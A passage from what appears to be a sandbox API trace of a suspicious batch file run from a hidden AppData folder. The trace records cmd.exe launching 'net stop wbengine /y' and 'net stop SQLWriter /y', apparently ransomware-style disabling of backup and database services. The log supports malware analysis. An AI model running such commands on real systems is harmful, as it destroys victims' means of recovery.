(lpRootPathName="C:\\") returned 0x3 [0045.395] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0045.395] GetLastError () returned 0x2 [0045.395] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0045.395] GetLastError () returned 0x2 [0045.395] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.395] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0045.395] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0045.395] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0045.395] GetLastError () returned 0x2 [0045.395] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0045.396] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0045.396] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0045.396] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0045.396] SetErrorMode (uMode=0x0) returned 0x1 [0045.396] GetProcessHeap () returned 0x3e0000 [0045.396] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0045.396] GetProcessHeap () returned 0x3e0000 [0045.396] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0045.396] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0045.396] GetProcessHeap () returned 0x3e0000 [0045.396] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0045.396] GetProcessHeap () returned 0x3e0000 [0045.396] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0045.396] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0045.396] GetProcessHeap () returned 0x3e0000 [0045.396] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0045.396] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.397] GetProcessHeap () returned 0x3e0000 [0045.397] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0045.397] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0045.397] GetProcessHeap () returned 0x3e0000 [0045.397] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0045.397] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.397] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0045.397] GetLastError () returned 0x2 [0045.397] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0045.397] GetLastError () returned 0x2 [0045.397] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.397] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0045.397] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0045.397] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0045.397] GetLastError () returned 0x2 [0045.398] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0045.398] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0045.398] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0045.398] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0045.398] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0045.398] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0045.398] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0045.398] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop wbengine /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop wbengine /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop wbengine /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x83c, dwThreadId=0x838)) returned 1 [0045.402] CloseHandle (hObject=0x78) returned 1 [0045.402] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0045.402] GetProcessHeap () returned 0x3e0000 [0045.402] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0045.402] GetEnvironmentStringsW () returned 0x3f8408* [0045.402] GetProcessHeap () returned 0x3e0000 [0045.402] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0045.402] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0045.402] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0045.635] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0045.642] CloseHandle (hObject=0x74) returned 1 [0045.642] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0045.642] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0045.642] GetProcessHeap () returned 0x3e0000 [0045.642] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0045.642] GetEnvironmentStringsW () returned 0x3f8408* [0045.642] GetProcessHeap () returned 0x3e0000 [0045.642] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0045.643] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0045.643] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0045.643] GetProcessHeap () returned 0x3e0000 [0045.643] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0045.643] GetEnvironmentStringsW () returned 0x3f8408* [0045.643] GetProcessHeap () returned 0x3e0000 [0045.643] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0045.643] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0045.643] GetProcessHeap () returned 0x3e0000 [0045.643] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0045.643] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0045.643] _get_osfhandle (_FileHandle=1) returned 0x264 [0045.643] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0045.643] _get_osfhandle (_FileHandle=1) returned 0x264 [0045.643] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0045.643] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0045.643] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0045.643] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0045.643] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0045.644] SetConsoleInputExeNameW () returned 0x1 [0045.644] GetConsoleOutputCP () returned 0x1b5 [0045.644] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0045.644] SetThreadUILanguage (LangId=0x0) returned 0x409 [0045.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0045.644] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0045.644] _get_osfhandle (_FileHandle=3) returned 0x74 [0045.644] SetFilePointer (in: hFile=0x74, lDistanceToMove=1924, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x784 [0045.644] GetProcessHeap () returned 0x3e0000 [0045.644] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0045.644] GetProcessHeap () returned 0x3e0000 [0045.644] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0045.644] GetProcessHeap () returned 0x3e0000 [0045.644] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0045.644] GetProcessHeap () returned 0x3e0000 [0045.644] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0045.645] GetProcessHeap () returned 0x3e0000 [0045.645] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0045.645] GetProcessHeap () returned 0x3e0000 [0045.645] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0045.645] GetProcessHeap () returned 0x3e0000 [0045.645] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0045.645] GetProcessHeap () returned 0x3e0000 [0045.645] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0045.645] GetProcessHeap () returned 0x3e0000 [0045.645] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0045.645] GetProcessHeap () returned 0x3e0000 [0045.645] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0045.645] GetProcessHeap () returned 0x3e0000 [0045.645] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0045.645] GetProcessHeap () returned 0x3e0000 [0045.645] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0045.645] GetProcessHeap () returned 0x3e0000 [0045.645] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0045.645] _get_osfhandle (_FileHandle=3) returned 0x74 [0045.645] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x784 [0045.645] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x113d, lpOverlapped=0x0) returned 1 [0045.645] SetFilePointer (in: hFile=0x74, lDistanceToMove=1947, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x79b [0045.645] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=23, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLWriter /y\r\nelper100 /y\r\n /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 23 [0045.645] _get_osfhandle (_FileHandle=3) returned 0x74 [0045.645] GetFileType (hFile=0x74) returned 0x1 [0045.645] _get_osfhandle (_FileHandle=3) returned 0x74 [0045.645] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x79b [0045.645] GetProcessHeap () returned 0x3e0000 [0045.645] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0045.646] GetProcessHeap () returned 0x3e0000 [0045.646] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0045.646] _tell (_FileHandle=3) returned 1947 [0045.646] _close (_FileHandle=3) returned 0 [0045.646] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0045.646] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0045.646] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0045.646] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0045.646] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0045.646] _wcsicmp (_String1="net", _String2="CD") returned 11 [0045.646] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0045.646] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0045.646] _wcsicmp (_String1="net", _String2="REN") returned -4 [0045.646] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0045.646] _wcsicmp (_String1="net", _String2="SET") returned -5 [0045.646] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0045.646] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0045.646] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0045.647] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0045.647] _wcsicmp (_String1="net", _String2="MD") returned 1 [0045.647] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0045.647] _wcsicmp (_String1="net", _String2="RD") returned -4 [0045.647] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0045.647] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0045.647] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0045.647] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0045.647] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0045.647] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0045.647] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0045.647] _wcsicmp (_String1="net", _String2="VER") returned -8 [0045.647] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0045.647] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0045.647] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0045.647] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0045.647] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0045.647] _wcsicmp (_String1="net", _String2="START") returned -5 [0045.647] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0045.647] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0045.647] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0045.647] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0045.647] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0045.647] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0045.647] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0045.647] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0045.647] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0045.647] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0045.647] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0045.647] SetErrorMode (uMode=0x0) returned 0x1 [0045.647] GetProcessHeap () returned 0x3e0000 [0045.647] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0045.647] GetProcessHeap () returned 0x3e0000 [0045.648] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0045.648] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0045.648] GetProcessHeap () returned 0x3e0000 [0045.648] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0045.648] GetProcessHeap () returned 0x3e0000 [0045.648] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0045.648] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0045.648] GetProcessHeap () returned 0x3e0000 [0045.648] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0045.648] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.648] GetProcessHeap () returned 0x3e0000 [0045.648] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0045.648] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0045.648] GetProcessHeap () returned 0x3e0000 [0045.648] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0045.648] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.648] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0045.648] GetLastError () returned 0x2 [0045.648] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0045.648] GetLastError () returned 0x2 [0045.648] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.649] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0045.649] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0045.649] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0045.649] GetLastError () returned 0x2 [0045.649] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0045.649] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0045.649] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0045.649] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0045.649] SetErrorMode (uMode=0x0) returned 0x1 [0045.649] GetProcessHeap () returned 0x3e0000 [0045.649] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0045.649] GetProcessHeap () returned 0x3e0000 [0045.649] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0045.649] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0045.650] GetProcessHeap () returned 0x3e0000 [0045.650] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0045.650] GetProcessHeap () returned 0x3e0000 [0045.650] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0045.650] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0045.650] GetProcessHeap () returned 0x3e0000 [0045.650] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0045.650] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.650] GetProcessHeap () returned 0x3e0000 [0045.650] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0045.650] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0045.650] GetProcessHeap () returned 0x3e0000 [0045.650] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0045.650] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.650] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0045.650] GetLastError () returned 0x2 [0045.650] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0045.650] GetLastError () returned 0x2 [0045.650] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.650] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0045.650] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0045.651] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0045.651] GetLastError () returned 0x2 [0045.651] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0045.651] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0045.651] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0045.651] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0045.651] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0045.651] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0045.651] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0045.651] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLWriter /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLWriter /y", dwX=0x0, dwY=0x1, dwXSize=0x64, 